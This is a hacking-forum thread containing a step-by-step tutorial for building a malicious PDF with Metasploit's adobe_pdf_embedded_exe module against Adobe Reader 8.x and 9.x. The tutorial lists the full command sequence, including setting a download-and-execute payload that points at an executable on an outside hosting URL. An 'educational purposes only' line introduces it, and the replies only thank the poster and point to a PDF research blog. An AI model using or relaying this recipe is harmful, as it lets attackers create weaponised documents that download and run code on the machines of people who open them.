PDF fileformat exploit ( Tutorial )

[enc0de]

Hello everyone haven't been here in a while just wanted to say whats up to everyone and the mods.
Before i start i have a question for the mods why have you disabled most of my privileges??


This tutorial is for educational purposes only and nothing more. By the way if you try to use this exploit good luck its picked up by all major AV vendors.


More File Format exploit tutorial here Enc0de's blog: File Format tutorial exploits (PDF/Office)

This tutorial with pictures here Enc0de's blog: Adobe PDF Embedded EXE (Adobe Reader v8.x, v9.x)



====Lets get started====


The exploit i will be using in this tutorial will only affect Adobe Reader v8.x, v9.x (Windows XP SP3 English).


First you need an exe file you wish to link to the PDF exploit I will be using calc.exe you can anything you like. Now once you figured out what file you want the PDF exploit to download execute go ahead and upload it to ripway. After all that is doen and ready start up Metasploit.


I always recommend running an update first.

Code:

svn up

Once the update is completed run this to pick the exploit.

Code:

use exploit/windows/fileformat/adobe_pdf_embedded_exe

Now once we have launched the correct exploit lets run show options to see what it requires from us in order to generate a the PDF.

Code:

show options

Now from looking at the picture we see we need to input a PDF file so go ahead and download what ever one you would like. Once you get the PDF file you want to insert please keep it on your /root/ directory to keep it simple.

Now I found one that I want to use to I will place it on my desktop and name it IN.pdf . Now once its on the desktop lets insert the correct location of the PDF in metasploit.

[ set INFILENAME /root/IN.pdf ]


Ok now we need to pick a payload and the one we are going to be using is the download execute payload.

Code:

set payload windows/download_exec

show options

Ok you see the highlighted part in the white this was added from inserting the payload download execute. Now I hope you have uploaded the file you want the PDF to download execute if not go ahead and do so.

Once you get the link we insert it like this.

hxxp://h1.ripway.com/Hrevolution/calc.exe

Code:

set url hxxp://h1.ripway.com/Hrevolution/calc.exe

Then all you need to do is just type exploit

Code:

exploit

[scottm99]

I haven't done much with PDF exploits in metasploit lately, so this tutorial will be just the thing to refresh my memory. Thanks

[thorin]

For anyone else digging or re-digging into this like scottm99 you might wanna check out Didier Stevens' blog he's got lots of great PDF stuff:
http://blog.didierstevens.com/

[scottm99]

Appreciate the link, thorin There's some good stuff on his blog.